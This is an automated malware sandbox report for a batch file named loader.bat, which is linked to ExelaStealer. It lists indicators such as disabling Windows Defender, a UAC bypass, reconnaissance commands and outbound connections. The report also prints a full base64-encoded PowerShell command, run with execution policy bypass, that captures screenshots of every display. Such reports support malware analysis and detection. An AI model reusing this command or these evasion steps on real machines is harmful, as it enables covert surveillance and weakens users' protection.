File name:

loader.bat

Full analysis: https://app.any.run/tasks/0bf3ba56-a317-4b08-b28d-b9af206c888c
Verdict: Malicious activity
Analysis date: November 11, 2024, 11:42:15
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
github
uac
evasion
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text, with very long lines (423), with CRLF line terminators
MD5:

F101CAFFB299390258AA53BAEC5EAE5D

SHA1:

833B191365093C727891DADC129BF03C9873023E

SHA256:

F1975DA153C5E27448093D9D2ADA9616F30DD16409C1621DD8F96AA1F992D52A

SSDEEP:

12:/gDBKO9fgCm9eZIy+YzSpeY53Lom3eLUomDJen8Uu+L9f59o:N7kZIyizSLUKu+6

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes settings for real-time protection

      • powershell.exe (PID: 3000)

    • Changes antivirus protection settings for downloading files from the Internet (IOAVProtection)

      • powershell.exe (PID: 3000)

    • Changes settings for reporting to Microsoft Active Protection Service (MAPS)

      • powershell.exe (PID: 3000)

    • Changes Controlled Folder Access settings

      • powershell.exe (PID: 3000)

    • Changes settings for sending potential threat samples to Microsoft servers

      • powershell.exe (PID: 3000)

    • Changes settings for checking scripts for malicious actions

      • powershell.exe (PID: 3000)

    • Changes settings for protection against network attacks (IPS)

      • powershell.exe (PID: 3000)

    • Antivirus name has been found in the command line (generic signature)

      • MpCmdRun.exe (PID: 5092)

    • Bypass User Account Control (ComputerDefaults)

      • ComputerDefaults.exe (PID: 2464)

    • Resets Windows Defender malware definitions to the base version

      • MpCmdRun.exe (PID: 5092)

    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 1784)

    • ExelaStealer has been detected

      • WinRar.exe (PID: 4208)

    • Starts NET.EXE to view/change users localgroup

      • net.exe (PID: 5084)
      • net.exe (PID: 6360)
      • cmd.exe (PID: 3744)

    • Starts NET.EXE to view/add/change user profiles

      • net.exe (PID: 7136)
      • net.exe (PID: 2432)
      • net.exe (PID: 6168)
      • cmd.exe (PID: 3744)

    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 1732)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 1788)

  • SUSPICIOUS

    • Probably download files using WebClient

      • cmd.exe (PID: 1784)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1784)
      • cmd.exe (PID: 6960)
      • cmd.exe (PID: 1732)

    • Application launched itself

      • cmd.exe (PID: 1784)
      • WinRar.exe (PID: 6132)
      • cmd.exe (PID: 6556)
      • cmd.exe (PID: 5512)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3568)
      • WinRar.exe (PID: 6132)
      • WinRar.exe (PID: 4208)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 1784)
      • cmd.exe (PID: 6556)
      • WinRar.exe (PID: 4208)
      • cmd.exe (PID: 5512)

    • Process drops legitimate windows executable

      • powershell.exe (PID: 3568)
      • WinRar.exe (PID: 6132)
      • WinRar.exe (PID: 4208)

    • Script disables Windows Defender's IPS

      • cmd.exe (PID: 1784)

    • Script disables Windows Defender's real-time protection

      • cmd.exe (PID: 1784)

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 1784)

    • Process drops python dynamic module

      • WinRar.exe (PID: 6132)

    • Get information on the list of running processes

      • cmd.exe (PID: 4448)
      • WinRar.exe (PID: 4208)
      • cmd.exe (PID: 5780)
      • cmd.exe (PID: 6284)
      • cmd.exe (PID: 3744)

    • Uses WMIC.EXE to obtain Windows Installer data

      • cmd.exe (PID: 5220)
      • cmd.exe (PID: 2720)

    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 6896)

    • Starts application with an unusual extension

      • cmd.exe (PID: 864)
      • cmd.exe (PID: 2444)

    • The process drops C-runtime libraries

      • WinRar.exe (PID: 6132)

    • Uses SYSTEMINFO.EXE to read the environment

      • cmd.exe (PID: 3744)

    • Uses NETSH.EXE to obtain data on the network

      • cmd.exe (PID: 7108)

    • Uses WMIC.EXE to obtain local storage devices information

      • cmd.exe (PID: 3744)

    • Uses WMIC.EXE to obtain commands that are run when users log in

      • cmd.exe (PID: 3744)

    • Uses QUSER.EXE to read information about current user sessions

      • query.exe (PID: 6704)

    • Uses ROUTE.EXE to obtain the routing table information

      • cmd.exe (PID: 3744)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 1732)

    • Process uses ARP to discover network configuration

      • cmd.exe (PID: 3744)

    • Starts SC.EXE for service management

      • cmd.exe (PID: 3744)

    • Suspicious use of NETSH.EXE

      • cmd.exe (PID: 3744)

    • Base64-obfuscated command line is found

      • cmd.exe (PID: 1732)

    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 1732)

    • Process uses IPCONFIG to discover network configuration

      • cmd.exe (PID: 3744)

    • Checks for external IP

      • WinRar.exe (PID: 4208)
      • svchost.exe (PID: 2172)

  • INFO

    • Checks operating system version

      • WinRar.exe (PID: 4208)

    • Changes the display of characters in the console

      • cmd.exe (PID: 864)
      • cmd.exe (PID: 2444)

    • The Powershell gets current clipboard

      • powershell.exe (PID: 4760)

    • Prints a route via ROUTE.EXE

      • ROUTE.EXE (PID: 6508)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
217
Monitored processes
81
Malicious processes
8
Suspicious processes
2

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs powershell.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs computerdefaults.exe no specs computerdefaults.exe no specs computerdefaults.exe mpcmdrun.exe no specs powershell.exe no specs winrar.exe #EXELASTEALER winrar.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs tasklist.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs attrib.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs tasklist.exe no specs mshta.exe no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs tasklist.exe no specs chcp.com no specs cmd.exe no specs powershell.exe no specs chcp.com no specs cmd.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs netsh.exe no specs systeminfo.exe no specs svchost.exe tiworker.exe no specs hostname.exe no specs wmic.exe no specs net.exe no specs net1.exe no specs query.exe no specs quser.exe no specs net.exe no specs net1.exe no specs net.exe no specs net1.exe no specs net.exe no specs net1.exe no specs net.exe no specs net1.exe no specs wmic.exe no specs tasklist.exe no specs ipconfig.exe no specs route.exe no specs arp.exe no specs netstat.exe no specs sc.exe no specs netsh.exe no specs netsh.exe no specs cmd.exe no specs conhost.exe no specs wmic.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
300C:\WINDOWS\system32\net1 user C:\Windows\System32\net1.exenet.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\net1.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
736\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
864cmd.exe /c chcpC:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
916wmic csproduct get uuidC:\Windows\System32\wbem\WMIC.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
1084\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1156arp -a C:\Windows\System32\ARP.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Arp Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\arp.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\snmpapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
1572C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\TiWorker.exe -EmbeddingC:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\TiWorker.exesvchost.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Modules Installer Worker
Version:
10.0.19041.3989 (WinBuild.160101.0800)
Modules
Images
c:\windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.3989_none_7ddb45627cb30e03\tiworker.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
1732C:\WINDOWS\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="C:\Windows\System32\cmd.exeWinRar.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
1784C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\loader.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
1788"C:\WINDOWS\system32\quser.exe"C:\Windows\System32\quser.exequery.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Query User Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\quser.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\winsta.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
Total events
37 535
Read events
37 529
Write events
6
Delete events
0

Modification events

(PID) Process:(2464) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries
Value:
6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID) Process:(2464) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(2464) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(2464) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(1572) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdHigh
Value:
31142958
(PID) Process:(1572) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdLow
Value:
Executable files
35
Suspicious files
16
Text files
25
Unknown types
0

Dropped files

PID
Process
Filename
Type
3568powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:065583D7963669AD365485695FB09EE3
SHA256:4A77215DB32B96A01084EEE339B68A42C3071EDD115780BB9BC59BAAE0D58DB2
3568powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jd3afryz.guw.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3000powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_x01dfaom.hkv.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6132WinRar.exeC:\Users\admin\AppData\Local\Temp\_MEI61322\_queue.pydexecutable
MD5:18B8B2B0AEFCEE9527299C464B7F6D3D
SHA256:6F334FA1474116DD499A125F3B5CA4CD698039446FAF50340F9A3F7AF3ADB8C2
6132WinRar.exeC:\Users\admin\AppData\Local\Temp\_MEI61322\_cffi_backend.cp310-win_amd64.pydexecutable
MD5:7727212E7BDBF63B1A39FB7FAAD24265
SHA256:B0116303E1E903D6EB02A69D05879F38AF1640813F4B110CB733FFFF6E4E985C
2236powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_usxiesn3.lsg.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6132WinRar.exeC:\Users\admin\AppData\Local\Temp\_MEI61322\VCRUNTIME140.dllexecutable
MD5:11D9AC94E8CB17BD23DEA89F8E757F18
SHA256:E1D6F78A72836EA120BD27A33AE89CBDC3F3CA7D9D0231AAA3AAC91996D2FA4E
6132WinRar.exeC:\Users\admin\AppData\Local\Temp\_MEI61322\_ctypes.pydexecutable
MD5:B1F12F4BFC0BD49A6646A0786BC5BC00
SHA256:1FE61645ED626FC1DEC56B2E90E8E551066A7FF86EDBD67B41CB92211358F3D7
6132WinRar.exeC:\Users\admin\AppData\Local\Temp\_MEI61322\_asyncio.pydexecutable
MD5:480D3F4496E16D54BB5313D206164134
SHA256:568FB5C3D9B170CE1081AD12818B9A12F44AB1577449425A3EF30C2EFBEE613D
3568powershell.exeC:\YOUR_FOLDER_NAME\WinRar.exeexecutable
MD5:E1D0026411B98A4062D426F01748DFE9
SHA256:4F5CB8360924428CBEEF2BBCBC3B84F0B4CF5C9B7DD4AF40CAAE5A0B2A8445CA
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
8
DNS requests
16
Threats
6

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4360
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
3788
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
2372
SystemSettings.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
2372
SystemSettings.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
4208
WinRar.exe
GET
200
208.95.112.1:80
http://ip-api.com/json
unknown
shared
5488
MoUsoCoreWorker.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5488
MoUsoCoreWorker.exe
GET
200
2.16.164.49:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
6944
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
3396
RUXIMICS.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5488
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
3568
powershell.exe
172.67.139.105:443
goo.su
CLOUDFLARENET
US
suspicious
3568
powershell.exe
140.82.121.4:443
github.com
GITHUB
US
shared
3568
powershell.exe
185.199.110.133:443
raw.githubusercontent.com
FASTLY
US
shared

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 40.127.240.158
whitelisted
google.com
  • 142.250.186.174
whitelisted
goo.su
  • 172.67.139.105
  • 104.21.38.221
unknown
github.com
  • 140.82.121.4
shared
raw.githubusercontent.com
  • 185.199.110.133
  • 185.199.111.133
  • 185.199.109.133
  • 185.199.108.133
shared
www.bing.com
  • 2.23.209.133
  • 2.23.209.187
  • 2.23.209.185
  • 2.23.209.135
  • 2.23.209.137
  • 2.23.209.186
  • 2.23.209.189
  • 2.23.209.130
  • 2.23.209.131
  • 2.23.209.148
  • 2.23.209.158
  • 2.23.209.156
  • 2.23.209.149
  • 2.23.209.154
  • 2.23.209.150
  • 2.23.209.144
  • 2.23.209.142
  • 2.23.209.143
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
login.live.com
  • 20.190.159.2
  • 20.190.159.0
  • 20.190.159.75
  • 40.126.31.73
  • 20.190.159.4
  • 20.190.159.73
  • 20.190.159.23
  • 20.190.159.71
whitelisted
cxcs.microsoft.net
  • 23.206.20.128
whitelisted
th.bing.com
  • 2.23.209.133
  • 2.23.209.135
  • 2.23.209.140
  • 2.23.209.141
  • 2.23.209.144
  • 2.23.209.143
  • 2.23.209.148
  • 2.23.209.137
  • 2.23.209.142
whitelisted

Threats

PID
Process
Class
Message
2172
svchost.exe
Misc activity
ET INFO Observed URL Shortener Service Domain in DNS Lookup (goo .su)
3568
powershell.exe
Misc activity
ET INFO Observed URL Shortener Service Domain (goo .su in TLS SNI)
2172
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to access raw user content on GitHub
2172
svchost.exe
Device Retrieving External IP Address Detected
INFO [ANY.RUN] External IP Check (ip-api .com)
4208
WinRar.exe
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup ip-api.com
2172
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
loader.bat